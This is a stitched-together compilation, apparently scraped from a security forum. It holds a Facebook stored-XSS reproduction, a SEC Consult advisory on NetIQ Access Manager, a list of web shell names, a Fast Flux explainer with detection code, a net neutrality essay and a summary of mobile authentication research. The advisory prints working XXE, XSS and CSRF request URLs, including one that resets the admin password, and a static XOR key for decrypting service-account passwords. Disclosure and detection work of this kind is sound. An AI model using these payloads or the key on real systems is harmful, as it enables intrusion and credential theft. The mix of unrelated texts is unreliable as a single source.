1. Open the following Facebook mobile web page (using Firefox):
   https://m.facebook.com/editprofile.php?type=contact&edit=website&refid=17
2. Remove all the website URLs you have (if any).
3. Add, for example, the value https://somethinag.com/"onmouseover="alert(31337);*. (the double quotes are part of the payload; do not add surrounding quotes).
4. Then browse to https://www.facebook-studio.com/dashboard#_=_ and the stored XSS fires.
Note: Facebook did not HTML-encode the URL when storing it in the database, so whenever the value is rendered the payload fires directly (it is not a second-order injection).

5. The vulnerability is reproduced successfully.

The full payload to add as your website URL is:

PoC: https://url-source.com/"style="font-size:900px;"onmouseover="alert(31337);*.

Solution - Fix & Patch:
=======================
The issue has already been patched by the Facebook developer team as part of the official bug bounty program.

Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the Facebook Studio website is estimated as medium. (CVSS 3.5)

Credits & Authors:
==================
Paulos Yibelo

Source
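The attribute break-out used in the PoC above, shown as an added example that is not part of the advisory and is not Facebook's code: a naive template that echoes the profile website URL into an href attribute, beside a hardened version that validates the scheme and HTML-encodes the value for attribute context. The `<a>` template, the function names and the check helper are assumptions made for the illustration; the payload is the one quoted in the advisory.

```python
"""Attribute-context stored XSS: the Facebook Studio PoC payload against a
naive template and against an encoding one.  Example added for this page; it
is not Facebook's or the researcher's code, and the <a> template is assumed."""
import re
from html import escape
from urllib.parse import urlsplit

# Payload quoted in the advisory above (stored via the mobile profile editor,
# rendered later on the Studio dashboard).
PAYLOAD = 'https://url-source.com/"style="font-size:900px;"onmouseover="alert(31337);*.'

# Assumed template: the profile "website" value is echoed into an href.
TEMPLATE = '<a href="{url}" rel="nofollow">{url}</a>'


def render_vulnerable(url):
    """Raw interpolation: a double quote in the value closes the href
    attribute, so the rest of the value becomes new attributes on the <a>."""
    return TEMPLATE.format(url=url)


def is_safe_url(url):
    """Allow only absolute http(s) URLs (blocks javascript:, data:, ...).
    Note that the PoC payload passes this check: scheme validation alone
    does not stop an attribute break-out, encoding is still required."""
    parts = urlsplit(url.strip())
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def render_hardened(url):
    """Validate the scheme, then HTML-encode for attribute context:
    escape(quote=True) turns '"' into &quot; so the value cannot close it."""
    if not is_safe_url(url):
        url = "#"
    return TEMPLATE.format(url=escape(url, quote=True))


def injected_attributes(html):
    """Attribute names on the rendered <a> start tag other than href/rel.
    A crude, tokenizer-free check that is good enough for this demonstration."""
    start_tag = html[: html.index(">") + 1]
    return [n for n in re.findall(r'([a-zA-Z-]+)="', start_tag) if n not in ("href", "rel")]
```

With the payload, `render_vulnerable` emits an anchor carrying extra `style` and `onmouseover` attributes (exactly what the dashboard rendered), while `render_hardened` keeps the whole value inside the `href` because every `"` becomes `&quot;`.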
-
SEC Consult Vulnerability Lab Security Advisory < 20141218-2 >
=======================================================================
              title: Multiple high risk vulnerabilities
            product: NetIQ Access Manager
 vulnerable version: 4.0 SP1
      fixed version: 4.0 SP1 Hot Fix 3
         CVE number: CVE-2014-5214, CVE-2014-5215, CVE-2014-5216, CVE-2014-5217
             impact: High
           homepage: https://www.netiq.com/
              found: 2014-10-29
                 by: W. Ettlinger
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor/product description:
---------------------------
"As demands for secure web access expand and delivery becomes increasingly complex, organizations face some formidable challenges. Access Manager provides a simple yet secure and scalable solution that can handle all your web access needs—both internal as well as in the cloud."

URL: https://www.netiq.com/products/access-manager/

Business recommendation:
------------------------
An attacker without an account on the NetIQ Access Manager is able to gain administrative access by combining different attack vectors. Though this host may not always be accessible from a public network, an attacker is still able to compromise the system by directly targeting administrative users. Because the NetIQ Access Manager is used for authentication, an attacker who compromises it can use it to gain access to other systems.

SEC Consult highly recommends that this software is not used until a full security review has been performed and all issues have been resolved.

Vulnerability overview/description:
-----------------------------------
1) XML eXternal Entity Injection (XXE, CVE-2014-5214)
Authenticated administrative users can download arbitrary files from the Access Manager administration interface as the user "novlwww".
The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015993

2) Reflected Cross Site Scripting (XSS, CVE-2014-5216)
Multiple reflected cross site scripting vulnerabilities were found. These allow effective attacks on administrative and SSLVPN sessions.
The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015994

3) Persistent Cross Site Scripting (XSS, CVE-2014-5216)
A persistent cross site scripting vulnerability was found. This allows effective attacks on administrative and SSLVPN sessions.
The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015996

4) Cross Site Request Forgery (CVE-2014-5217)
The Access Manager administration interface does not have CSRF protection.
The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015997

5) Information Disclosure (CVE-2014-5215)
Authenticated users of the administration interface can obtain authentication information of internal administrative service accounts.
The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015995

By combining all of the above vulnerabilities (CSRF, XSS, XXE) an unauthenticated, non-admin user may gain full access to the system!

Proof of concept:
-----------------
1) XML eXternal Entity Injection (XXE)
As an example, the following URL demonstrates the retrieval of the /etc/passwd file as an authenticated administrative user:
https://<host>:8443/nps/servlet/webacc?taskId=fw.PreviewObjectFilter&nextState=initialState&merge=fw.TCPreviewFilter&query=<!DOCTYPE+request+[%0a<!ENTITY+include+SYSTEM+"/etc/passwd">%0a]><query><container>%26include%3b</container><subclasses>false</subclasses></query>

2) Reflected Cross Site Scripting (XSS)
The following URLs demonstrate different reflected XSS flaws in the administration interface and the user interface.
https://<host>:8443/nps/servlet/webacc?taskId=dev.Empty&merge=dm.GenericTask&location=/roma/jsp/admin/view/main.jss'%2balert+('xss')%2b'
https://<host>:8443/roma/jsp/debug/debug.jsp?xss=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
https://<host>:8443//nps/servlet/webacc?taskId=debug.DumpAll&xss=%3Cimg%20src=%22/404%22%20onerror=%22alert+%28%27xss%27%29%22%3E
https://<host>/nidp/jsp/x509err.jsp?error=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
https://<host>/sslvpn/applet_agent.jsp?lang=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

3) Persistent Cross Site Scripting (XSS)
The following URL injects a stored script on the auditing page:
https://<host>:8443/roma/system/cntl?handler=dispatcher&command=auditsave&&secureLoggingServersA='){}};alert('xss');function+){if('&port=1289

4) Cross Site Request Forgery
As an example, an attacker is able to change the administration password to '12345' by issuing a GET request in the context of an authenticated administrator. The old password is not necessary for this attack!
https://<host>:8443/nps/servlet/webacc?taskId=fw.SetPassword&nextState=doSetPassword&merge=dev.GenConf&selectedObject=P%3Aadmin.novellP&single=admin.novell&SetPswdNewPassword=12345&SetPswdVerifyPassword=12345

5) Information Disclosure
The following URLs disclose information useful to an attacker who holds any authenticated account:
https://<host>:8443/roma/jsp/volsc/monitoring/dev_services.jsp
https://<host>:8443/roma/jsp/debug/debug.jsp

The disclosed system properties:
com.volera.vcdn.monitor.password
com.volera.vcdn.alert.password
com.volera.vcdn.sync.password
com.volera.vcdn.scheduler.password
com.volera.vcdn.publisher.password
com.volera.vcdn.application.sc.scheduler.password
com.volera.vcdn.health.password

The static string "k~jd)*L2;93=Gjs" is XORed with these values in order to decrypt the passwords of internally used service accounts.

By combining all of the above vulnerabilities (CSRF, XSS, XXE) an unauthenticated, non-admin user may gain full access to the system!
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in NetIQ Access Manager version 4.0 SP1, which was the most recent version at the time of discovery.

Vendor contact timeline:
------------------------
2014-10-29: Contacting security@netiq.com, sending responsible disclosure policy and PGP keys
2014-10-29: Vendor redirects to security@novell.com, providing PGP keys through Novell support page
2014-10-30: Sending encrypted security advisory to Novell
2014-10-30: Novell acknowledges the receipt of the advisory
2014-12-16: Novell: the vulnerability fixes will be released tomorrow; the CSRF vulnerability will not be fixed immediately ("Since this can be done only after an authorized login"); two XSS vulnerabilities can not be exploited ("We could not take advantage or retrieve any cookie info on the server side - it looks like it's a client side cross scripting attack.")
2014-12-16: Explaining why those vulnerabilities can be exploited
2014-12-17: Novell: Fix will be released tomorrow
2014-12-17: Verifying release of advisory tomorrow
2014-12-18: Novell: Advisory can be released
2014-12-18: Coordinated release of security advisory

Solution:
---------
Update to the latest available version of Access Manager and implement the workarounds mentioned in the KB articles by Novell linked above.

Workaround:
-----------
For some vulnerabilities, Novell provides best practice recommendations in the URLs linked above.

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com

EOF W. Ettlinger / @2014

Source
-
Well, are many more of you going to come begging? Off-topic: Any idea how I can get hold of 1 million dollars? I only need 1 more million and I'll be a millionaire!

https://rstforums.com/forum/94024-ajutor-imprumut.rst
https://rstforums.com/forum/60486-imprumut.rst
https://rstforums.com/forum/75076-3-centi-paypal.rst
https://rstforums.com/forum/62373-imprumut-3-euro.rst
https://rstforums.com/forum/85639-imprumut-paypal.rst
https://rstforums.com/forum/71639-5-e-paypal.rst
https://rstforums.com/forum/86029-imprumut-3-paypal-pana-maine.rst
https://rstforums.com/forum/88712-care-s-mi-dea-n-mprumut-1-a.rst
https://rstforums.com/forum/88965-cerere.rst
https://rstforums.com/forum/88936-cerere-paypal.rst
https://rstforums.com/forum/91739-imprumut-cu-1-0-73-e-paypal.rst
https://rstforums.com/forum/92423-imprumut-2-paypal.rst
https://rstforums.com/forum/93231-salut-rst.rst
https://rstforums.com/forum/93989-am-nevoie-de-ajutor.rst
-
CCCPShell
Acid Shell v2
b374k 2.2 Shell
-
Introduction

In this series of articles we will learn about a not-so-new type of attack that is nevertheless one of the hardest to control: Fast Flux. This article explains what Fast Flux is, the types of Fast Flux networks, and how Fast Flux works. In the next article of this series we will look at why Fast Flux is difficult to detect in an environment, and then at the recommended ways to detect it.

What is Fast Flux?

Fast Flux is a technique generally used by botnets to hide their phishing and malware delivery sites behind an ever-changing network of compromised hosts acting as proxies. The term can also refer to the combination of peer-to-peer networking, distributed command and control, web-based load balancing and proxy redirection used to make malware networks more resistant to discovery and counter-measures.

How Fast Flux Works

The basic idea behind Fast Flux is to associate numerous IP addresses with a single fully qualified domain name and to swap those addresses in and out with extremely high frequency by changing the DNS records. This is achieved with a combination of round-robin IP addresses and a very short Time-To-Live (TTL) for any given DNS Resource Record (RR). A hostname may be associated with a new set of IP addresses as often as every 3 minutes, which means that a client (for example a browser) connecting to the same website every 3 minutes would actually be connecting to a different infected computer each time.

The large pool of rotating IP addresses is not the final destination of the request for the content. Instead, the compromised front-end systems are merely deployed as redirectors, called flux agents, which funnel requests and data to and from other back-end servers that actually serve the content. Essentially, the domain names and URLs for advertised content no longer resolve to the IP address of a specific server, but instead fluctuate amongst many front-end redirectors or proxies, which in turn forward content to another group of back-end servers.

In addition, the attackers ensure that the compromised systems they use to host their scams have the best possible bandwidth and service availability. They often use a load-distribution scheme that takes node health-check results into account, so that unresponsive nodes are taken out of flux and content availability is always maintained.

Types of Flux Networks

Fast Flux networks fall into two major categories.

Single flux networks: In these networks a set of compromised nodes register and deregister their addresses as part of the DNS A record list for a single DNS name. In the figure below, normal client-server communication is shown first: an end-user agent such as a web browser sends its request to the server and the server fulfils it directly. In a single flux network, by contrast, the browser's communication with the server is proxied via a redirector, normally called a flux-bot. For example, the victim requests example.com and the browser is actually talking to the flux network; the request then gets redirected to the target website. Single flux service networks change the DNS records for their front-end node IP addresses as often as every 3-10 minutes, so even if one flux-agent redirector node is shut down, many other infected redirector hosts are standing by and available to quickly take its place. Because Fast Flux techniques use blind TCP and UDP redirects, any service protocol with a single target port would likely encounter few problems being served via a Fast Flux service network: along with DNS and HTTP, this includes services such as SMTP, IMAP and POP.

Double flux networks: These networks are characterized by multiple nodes registering and deregistering as part of the DNS NS records. Both the DNS A record sets and the authoritative NS records for a malicious domain are continually changed in a round-robin manner and advertised into the Fast Flux service network. The figure below outlines how double flux networks work and how they differ from single flux networks.

First, let's revise how resolution works in a single flux network. Suppose the user requests a resource named http://abc.example.com. The end-user client (the browser) first asks a DNS root name server to resolve the top-level domain, .com, and the root NS responds with the address of the .com name server. Next, the browser queries that NS for the domain example.com and receives as an answer a referral to the name server ns.example.com. Then the browser queries ns.example.com for the address of abc.example.com. The NS responds with an IP address, and since this is a single flux network, that IP address changes frequently.

In a double flux network everything is the same except for the last step, where the client asks the authoritative NS for the resolution of abc.example.com: here the IP address of the authoritative NS itself is also changing frequently. When a DNS request for abc.example.com is received from the client, the current authoritative name server forwards the query to the mothership node for the required information. The client can then attempt to initiate direct communication with the target system, although the target system will itself be a dynamically changing front-end flux-agent node. This provides an additional layer of redundancy and survivability within the malware network.
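The two flux types described above can be told apart from repeated lookups alone: a single flux name rotates its A records while its name servers stay put, a double flux name rotates both. The following is an added example written for this page (it is not the article's code): it classifies a name as stable, single-flux or double-flux from the TTL, the size and network spread of the IP pool and the churn between consecutive answers, and, for double flux, from the same measures applied to the name servers' own addresses. The observations are constructed and the thresholds (TTL of 10 minutes or less, at least 5 IPs across at least 3 distinct /16 networks, half the lookups changing) are the editor's assumptions, chosen to separate a rotating flux pool from an ordinary CDN with a short TTL.

```python
"""Single- vs. double-flux classification from repeated DNS lookups, as
described in the article above.  Example added for this page (not the
article's code); the observations are constructed and thresholds assumed."""
from dataclasses import dataclass, field
from ipaddress import ip_address


@dataclass
class Lookup:
    """One resolution of a name at time t (seconds): answer IPs and their TTL."""
    t: int
    ips: list
    ttl: int


@dataclass
class DomainObservations:
    name: str
    a_lookups: list                                   # answers for the name itself
    ns_lookups: dict = field(default_factory=dict)    # NS hostname -> its A lookups


# Thresholds (assumptions): the article cites 3-10 minute rotation, so a TTL
# of ten minutes or less plus a large, scattered, changing pool is the signal.
MAX_FLUX_TTL = 600
MIN_UNIQUE_IPS = 5
MIN_DISTINCT_PREFIXES = 3
MIN_CHURN = 0.5


def distinct_prefixes(ips, bits=16):
    """Count distinct /bits networks: flux agents are home machines scattered
    across many networks, whereas a CDN usually answers from a few blocks."""
    return len({int(ip_address(ip)) >> (32 - bits) for ip in ips})


def churn(lookups):
    """Fraction of consecutive lookups whose answer set changed."""
    if len(lookups) < 2:
        return 0.0
    changes = sum(1 for a, b in zip(lookups, lookups[1:]) if set(a.ips) != set(b.ips))
    return changes / (len(lookups) - 1)


def flux_features(lookups):
    all_ips = {ip for lu in lookups for ip in lu.ips}
    return {
        "min_ttl": min(lu.ttl for lu in lookups),
        "unique_ips": len(all_ips),
        "prefixes": distinct_prefixes(all_ips),
        "churn": churn(lookups),
    }


def looks_fluxy(feat):
    return (feat["min_ttl"] <= MAX_FLUX_TTL and feat["unique_ips"] >= MIN_UNIQUE_IPS
            and feat["prefixes"] >= MIN_DISTINCT_PREFIXES and feat["churn"] >= MIN_CHURN)


def classify_domain(obs):
    """'double-flux' if both the A records and the NS hosts' addresses rotate,
    'single-flux' if only the A records do, otherwise 'stable'."""
    if not looks_fluxy(flux_features(obs.a_lookups)):
        return "stable"
    ns_fluxy = any(looks_fluxy(flux_features(lus)) for lus in obs.ns_lookups.values() if lus)
    return "double-flux" if ns_fluxy else "single-flux"


# Constructed observations (documentation/test address ranges, not real data).
CDN = DomainObservations("cdn.example.net", [
    Lookup(0, ["203.0.113.10", "203.0.113.11"], 60),
    Lookup(60, ["203.0.113.11", "203.0.113.10"], 60),
    Lookup(120, ["203.0.113.12", "203.0.113.10"], 60)])

SINGLE = DomainObservations("abc.example.com", [
    Lookup(0, ["198.51.100.5", "192.0.2.77", "203.0.113.9"], 180),
    Lookup(180, ["192.0.2.77", "198.51.100.200", "100.64.3.4"], 180),
    Lookup(360, ["100.64.3.4", "203.0.113.250", "198.18.7.7"], 180),
    Lookup(540, ["198.18.7.7", "192.0.2.8", "100.64.9.9"], 180)],
    {"ns.example.com": [Lookup(0, ["203.0.113.53"], 3600),
                        Lookup(3600, ["203.0.113.53"], 3600)]})

DOUBLE = DomainObservations("abc.example.com", SINGLE.a_lookups, {
    "ns1.example.com": [Lookup(0, ["192.0.2.10"], 300), Lookup(300, ["100.64.8.1"], 300),
                        Lookup(600, ["198.18.2.2"], 300), Lookup(900, ["203.0.113.77"], 300),
                        Lookup(1200, ["198.51.100.3"], 300)]})

if __name__ == "__main__":
    for obs in (CDN, SINGLE, DOUBLE):
        print(obs.name, flux_features(obs.a_lookups), classify_domain(obs))
```

The CDN case is the important negative: a short TTL alone is not evidence of flux, which is why the pool size, the network spread and the churn are all required before a name is flagged.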
Readers should now have a better understanding of Fast Flux networks, their types and how they work. In the next article we will see how an attacker benefits from this technique, why Fast Flux networks are difficult to detect, and the recommended ways to detect them.

References

Fast flux. Wikipedia, the free encyclopedia.

Source
-
Introduction

Years of discussion on the right to a free and open Internet have not yet settled the matter, and the issue remains a subject of heated debate among its stakeholders: users, telecommunications companies and governments. The discussion revolves not only around the ability of governments to control the information and services that travel on the Net, but also around the possibility that telecommunications providers decide which content to prioritize. Much has been written on the subject, but where do we currently stand? This article highlights recent proposals and statements by government officials that have brought the subject back to light, and the different stances that European countries and the U.S. are taking.

The Basis of the Argument

The fundamental issue in the network neutrality debate is the principle of open access to the Net, set against the possibility that broadband providers ease or slow users' access to information, applications, sites and platforms as they please, most likely favoring higher-paying customers. Those arguing for and against network neutrality both bring compelling reasons to the table.

Network neutrality advocates believe that whenever an Internet Service Provider (ISP) treats some broadband traffic or some network users differently, it goes against the basic principles that have governed the Internet so far, including free access to information by all. They are concerned that this form of discrimination could eventually make the Internet less valuable to end users. Network neutrality is supported not only by many users but also by well-known Internet companies such as Amazon, eBay and Vonage, which worry that broadband providers could gain the power to decide which competing application to favor. In their view, ISPs should not control what data arrives to users or how fast, and should not be concerned with what content is transmitted (as long as it is lawful), only that it is transmitted properly. Such power in the hands of telecom providers would stifle competition and slow the pace of a broadband deployment that was designed to empower consumers.

Many advocates of this freedom are also in academia. Lawrence Lessig, an American academic and political activist, is a supporter of the network neutrality movement. He has asked Congress to defend Michael Powell's four Internet freedoms (freedom to access content, to use applications, to attach personal devices, and to obtain service plan information), believing openness will trigger a new wave of innovation. Tim Wu, an American academic and professor at Columbia Law School, whose paper "Network Neutrality, Broadband Discrimination" explores a non-discrimination regime and a self-regulation or non-regulation approach to preserving network neutrality, is devoted to keeping the Internet open and argues that network service providers should not be allowed to deny people access to web resources or to prioritize certain content. Wu has also pressed the FCC for network neutrality in wireless computing and insists telecom carriers should carry content without discrimination. Even U.S. politicians have come forward to express concern over net neutrality. President Obama, for example, says he is unequivocally committed to net neutrality and would oppose any Federal Communications Commission plan that creates a so-called Internet "fast lane".

It is no surprise, on the other hand, that many telecom providers keep arguing for less neutrality and more control. With the Internet becoming more data-intensive, accommodating new technologies (e.g., VoIP, IPTV, Wi-Fi, power-line communication) and meeting the growing demands of modern audio and video applications, which keep raising bandwidth requirements, telecom carriers believe they have the right to decide what is transmitted on their networks, and at what price. They therefore want to be allowed to favor their own content and to charge extra fees to give others VIP treatment; in addition, they want to be able to turn away those who cannot afford the premium service. In general, cable companies want to end strict net neutrality and oppose treating all data on the Internet equally; as for-profit companies, they believe in their right to charge different fees according to the service provided and to slow down any sites that will not pay up. In other words, cable carriers want to charge Internet content companies such as Google and Netflix for faster and better Internet service, and those that pay will be guaranteed that their content reaches end users ahead of those who do not. The higher costs are justified, in their view, by the need to upgrade the infrastructure frequently to meet the increasing demand for speed and bandwidth driven by the growth in audio and HD video content sharing.

Network providers could thus favor some clients with higher-speed delivery while degrading the service of specific content providers. This would have a major impact not only on individual Internet users but also on online companies, especially smaller businesses that rely on the open Internet to launch their products and present their goods, applications and services to customers. That, of course, requires all data on the Internet to be treated equally and broadband carriers to route all traffic neutrally, without blocking, speeding up or slowing down particular applications or content.
Many people want to preserve the Internet as it is, without regulation or legal intervention that would allow network operators to dictate what people can do online. This is how the whole debate started and progressed; it has become a major topic of discussion in relation to the framework set forth by the Federal Communications Commission (FCC), which has increased its oversight of this area.

FCC's Proposal and Reactions

The FCC's stance on network neutrality was initially clear. In December 2010 the commission issued the Open Internet Order, establishing three basic rules for ISPs to follow:

Transparency of network management practices, performance and terms of service
No blocking of lawful content, applications and services
No unreasonable discrimination when transmitting lawful traffic

The FCC was protecting net neutrality, in the beginning at least. Chairman Tom Wheeler's subsequent proposal for a new open Internet framework, drafted after the 2010 order was struck down in federal court, is now challenging that concept. His set of rules allowing an online fast lane has been criticized: a number of complaints say it would undermine the goal of net neutrality, and the "overwhelming surge" of commenters providing feedback, mostly criticism, through the FCC's online comment filing system shows how sensitive the subject is. The proposal is still in line with the FCC's net neutrality stance, but for the first time it possibly introduces different rules for "wholesale" and "retail" transactions, the former being regulated more lightly.

Alongside end users, Internet activists and many U.S. politicians believe in a free and open Internet with no arbitrary fees or slow lanes for sites that cannot pay for technology that serves their interests. Those who support net neutrality are deeply concerned about the FCC's controversial proposal and about where the Internet is heading. It is also becoming an economic problem, which probably explains the recent interventions of senior political figures, including President Obama, in the debate. The President released an official statement affirming, "An open Internet is essential to the American economy, and increasingly to our very way of life. By lowering the cost of launching a new idea, igniting new political movements, and bringing communities closer together, it has been one of the most significant democratizing influences the world has ever known." The President urges the FCC not to "allow Internet service providers (ISPs) to restrict the best access or to pick winners and losers in the online marketplace for services and ideas [...] and implement the strongest possible rules to protect net neutrality."

On the other side of the argument stands Michael Powell, a former FCC chairman (2001-05) and the current president of the lobbying trade group the National Cable & Telecommunications Association (NCTA). He has contributed numerous editorials (in the National Journal and other media) and opinion pieces opposing net neutrality and calling for ISPs to be allowed pay-to-play fast lanes, for the sake of Internet availability. Powell argues that net neutrality impairs rather than helps technological progress. He believes regulation discourages new competitors from entering the broadband provider market, favors large regulated companies, discourages investment and effectively kills innovation.

Net neutrality in Europe

The debate over net neutrality has gone on for years in the U.S. Is the rest of the world immune? Certainly not. The debate has extended internationally, where the problem has become centered on terrestrial networks, especially in Europe. It has turned into a wide-scale problem, influenced by state-level politics and ultimately concerning consumer choice in broadband Internet access services.
Just a few months ago, in the spring of 2014, Europe discussed in its multi-country parliament the new rules and regulations for the managing of the Internet arena. The response of European lawmakers was unmistakable: a strong stance in defense of net neutrality. They voted to limit the ability of telecommunication providers to charge third parties in order to provide faster network access. Providers will be able to limit and slow down services only for a limited time in particular cases to include network security needs or court orders. Acknowledging that ISPs are still commercial entities with expenses (due to costly network upgrades to provide more advanced services to clients), telecom providers will be allowed to offer specialized services at a premium (to include video services and some cloud business applications) but that can’t be at the disadvantage of other clients; in addition, the services must be provided by ISPs and not third parties. Now it will be up to each individual European country to receive and enforce the rules, but the European Parliament vote is definitely a step towards the security of the net neutrality principle in Europe.

Conclusion

Conceivably, the viewpoint of Jon Peha from Carnegie Mellon University in his paper “The Benefits and Risks of Mandating Network Neutrality, and the Quest for a Balanced Policy” could clear up the issue on hand and be a way out of the debate, as it proposes a balanced approach to the concerns of those who are for and against net neutrality. “Success depends on moving the debate from vague principles to specific details about what practical forms of discrimination should and should not be allowed, and where one can prohibit the harmful without prohibiting the beneficial,” stated Peha back in 2006. The question may not be who ought to pay for certain Internet services, but rather, more importantly, to work out the rights and freedoms consumers and carriers deserve.
With Obama having spoken last month demanding the FCC to keep the Internet free & open, one may question if the FCC will listen and consider reclassifying broadband Internet service as a telecommunications service in order to preserve net neutrality. It seems that the U.S. president’s take on the matter will highly influence the debate in the U.S. and may force the government to issue clear regulations to control the perceived power of ISPs.

References

Carlsmith, E. M. & Wendell, L. C. (2006). Testimony of Lawrence Lessig – In Support of Network Neutrality. Retrieved from http://moritzlaw.osu.edu/students/groups/is/files/2012/02/lessig-formatted.pdf

Kastrenakes, J. (2014, September 16). FCC received a total of 3.7 million comments on net neutrality. Retrieved from FCC received a total of 3.7 million comments on net neutrality | The Verge

King, A. (2014, September 10). King Calls on FCC to Adopt Stronger Net Neutrality Rules. Retrieved from Press Release | Press Releases | Newsroom | Angus King | U.S. Senator for Maine

Miller, Z. L. (2014, October 9). Obama Signals Opposition to ‘Fast Lanes’ in Support of Net Neutrality. Retrieved from Obama Signals Opposition to 'Fast Lanes' in Support of Net Neutrality - TIME

Open Internet Coalition. (n.d.). Why an Open Internet – Openness is a Fundamental Principle of the Internet. Retrieved from Open Internet Coalition: Why an Open Internet

Peha, J. M. (2006). The Benefits and Risks of Mandating Network Neutrality, and the Quest for a Balanced Policy. Retrieved from Carnegie Mellon University, at http://repository.cmu.edu/cgi/viewcontent.cgi?article=1021&context=epp

Powell, M. (2014, October 31). Michael Powell: The FCC and competition. Retrieved from Michael Powell: The FCC and competition - The Orange County Register

The White House, United States Government. (n.d.). Net Neutrality: President Obama’s Plan for a Free and Open Internet. Retrieved from Net Neutrality: President Obama's Plan for a Free and Open Internet | The White House

Wyatt, E. (2014, April 23). F.C.C., in a Shift, Backs Fast Lanes for Web Traffic. Retrieved from http://www.nytimes.com/2014/04/24/technology/fcc-new-net-neutrality-rules.html?_r=0

Source
-
Introduction

The rapid diffusion of mobile technology and the convergence of numerous services that use the paradigms, including social networking, cloud computing and payment, are urging IT and security industries to develop new solutions for user authentication. Passcodes, PINs and thumbprints are a few samples of mechanisms that could be adopted to protect mobile devices. Security experts are aware that human behavior represents the weakest link in the security chain. For this reason, one of their principal goals is to improve the user’s experience with effective and easy to use security measures. The above methods for example are effective, but users are induced into misbehavior by laziness and carelessness.

Mobile devices are becoming an essential component in our daily life. They manage a huge quantity of information that concurs to the definition of our digital identity. Mobile devices are used to maintain relationships on a social network, to complete payments as part of a two-factor authentication scheme for web services, and to store sensitive user data. Traditional authentication methods are perceived by mobile users as a waste of time. The majority of them do not use authentication on their mobile phones. The problem is that users are, in the majority of cases, totally unaware of principal cyber threats and ignore the importance of authentication processes.

Groups of research and mobile device vendors are trying to improve users’ experience related to the authentication processes by introducing user behavior and biometric analysis. The research industry is trying to develop implicit authentication mechanisms that rely on user behavior, which is accomplished by building so-called user profiles from various sensor data.
The User Behavior Modelling approach with mobile device sensors

To overcome the users’ wrong habits and improve their experience while maintaining a significant level of security, a group of researchers at the Glasgow Caledonian University (Hilmi Gunes Kayacık, Mike Just, Lynne Baillie, David Aspinall and Nicholas Micallef) has developed a sensor-based authentication method that could simplify the verification of a phone’s user identity. The proposed approach is based on the definition of a user profile through the data collected by the numerous sensors that are present in the mobile phone. If the user behavior observed by the device sensors appears consistent with his profile, the device will have high comfort, while in the presence of some discrepancies a new authentication action is required and alternative measures will be triggered, such as requiring a passcode. It is clear that this kind of approach is more comfortable for the user due to the reduction of the occurrences of explicit authentication. The approach encourages more individuals to adopt this kind of authentication mechanism for their devices.

“We propose a lightweight, and temporally and spatially aware user behaviour modelling technique for sensor-based authentication. Operating in the background, our data driven technique compares current behaviour with a user profile. If the behaviour deviates sufficiently from the established norm, actions such as explicit authentication can be triggered. To support a quick and lightweight deployment, our solution automatically switches from training mode to deployment mode when the user’s behaviour is sufficiently learned. Furthermore, it allows the device to automatically determine a suitable detection threshold,” reports the abstract titled “Data Driven Authentication: On the Effectiveness of User Behaviour Modelling with Mobile Device Sensors”.
User Behaviour Modelling could prevent unauthorized access to a user’s phone, because the technique is able to discriminate the legitimate owner of the device. The technique developed by the researchers is very effective. The way they create the user’s profile based on habits is very interesting, for example, examining the nearest cellphone towers to create contextual “anchors” used to define user behavior throughout the day. This means that the technique uses location data related to the user’s movements during an ordinary day. The researchers based their analysis on the concept of “anchor”, a sort of snapshot used by the experts to gather information on the user habit, including mobile apps used, Wi-Fi networks accessed, and connections with other devices through Bluetooth. The “anchor” is also used to collect information related to the environment surrounding the mobile device, for example the noise and light levels of the areas visited by the user.

All the data collected by the researchers allowed them to profile users. The experts defined an algorithm to match real time behavior with normal behavioral patterns. The results of the experiments conducted on the algorithm in a few weeks are surprising. The model allowed them to discover if a stranger had stolen a user’s smartphone in two minutes with 99% accuracy. The researchers also made a series of tests in a worst case scenario. For example, they simulated the theft of the mobile made by a roommate who was even given a list of the apps the owner generally used. In this case, the software designed by the team of researchers discovered the theft in about ten minutes with 53% accuracy. The experts also explained that the algorithm presents a low rate of false positives.

The User Behavior Modelling technique

The researchers designed their software to operate in training mode until it is able to track a user’s profile.
This activity is transparent for the end-user and will be completed once the application has defined a user’s profile through the analysis of his routine. The team of experts highlighted that, different from previous works, the “learning mode” implemented in the solution is incremental and collects data until it is able to track a user’s profile. “We however argue that training duration must be set automatically on a per user basis since, as our evaluation shows, there is no one-size-fits-all,” states the paper. Other similar works incorporated user feedback for refinement of tracked profiles, and they do not consider the duration of training. The first approach is not suitable for the deployment of the technology on a large scale, because it is reasonable to expect that a user will not expend any effort in ‘teaching’ the device by providing feedback, “but they will quickly grow tired if frequent and labor-intensive feedback is required”.

The profiling technique elaborated by the experts is based on the definition of temporal and spatial models that are built starting from the data in a lightweight and non-parametric way. Once the algorithm has qualified a profile, the training is completed and the application switches from the training mode to a deployment mode. At this point, every time the parameters defined by the model are below the threshold, which was calculated considering user settings, the software launches an authentication challenge.

The dataset used by the researchers for the tests is composed of data collected by seven staff and students of the Glasgow Caledonian University. The data collected in 2013 from Android devices includes various kinds of information like sensor data from Wi-Fi networks, cell towers data, application usage, surrounding environment’s parameters (light and noise levels) and device system stats. Data composing the dataset was collected in a period of variable duration, from 2 weeks to 14 weeks for different users.
To improve the efficiency of the analysis, the experts included in the dataset a detailed diary for each profile, which allows them to conduct further investigation on anomalies.

